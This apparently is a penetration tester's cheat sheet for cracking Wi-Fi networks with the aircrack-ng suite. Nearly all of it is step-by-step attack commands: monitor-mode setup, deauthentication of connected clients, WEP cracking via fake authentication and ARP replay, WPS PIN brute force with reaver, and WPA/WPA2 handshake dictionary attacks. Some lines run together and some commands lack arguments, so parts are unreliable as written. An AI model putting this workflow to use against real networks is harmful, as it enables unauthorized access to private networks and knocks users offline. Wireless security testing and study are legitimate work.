Tools
airodump-ng
Scanning
Adapter must be in monitor mode
ifconfig wlan0 downairodump-ng check kill
iwconfig mode monitor
ifconfig wlan0 upto sniff 5g, use
--band abg(or whatever specific band you are looking for)
# Get new interface
iwconfig
airodump-ng --band abg [iface]Get information of the network we are trying to crack
BSSID
Channel
airodump-ng --band abg --bssid [BSSID] -c [channel] -w [outfile] [iface]Deauth Attack
Disconnect a client from the networks (with scan running)
May need to run the deauth attack many times to get handshake, would be best to attempt against various targets
Crack the capture file
WEP
run a specific airodump scan
Need a high number of Data packets (IVs) to easily crack the key. Busier networks mean more data packets
if we don't have much traffic on the network, we can use fake auth packets to force the AP to generate IVs
associate to the network
aireplay-ng --fakeauth 0 -a [AP BSSID] -h [my mac address] mon0
arp replay
aireplay-ng --arpreplay -b [AP BSSID] -h [my mac address] mon0wait for packets to fly
aircrack-ng [filename].capcan use ascii or key with colons removed to connect to network
WPA/WPA2
WPS
discover WPS enabled devices
wash --interface mon0
brute with reaver
reaver --bssid [AP mac address] --channel [network channel] --interface mon0 -vvv --no-associateif send_packet bug, revert to older version of reaver
associate to network
aireplay-ng --fakeauth 30 -a [AP BSSID] -h [my mac address] mon0we're increasing the timeout to 30 between association attempts so we don't get locked out
Standard
run a specific airodump scan
wait for handshake to be captured or use short deauth attack (send 4 deauth packets)
run a dictionary attack with file containing handshake
aircrack-ng [filename].cap -w [wordlist]
Last updated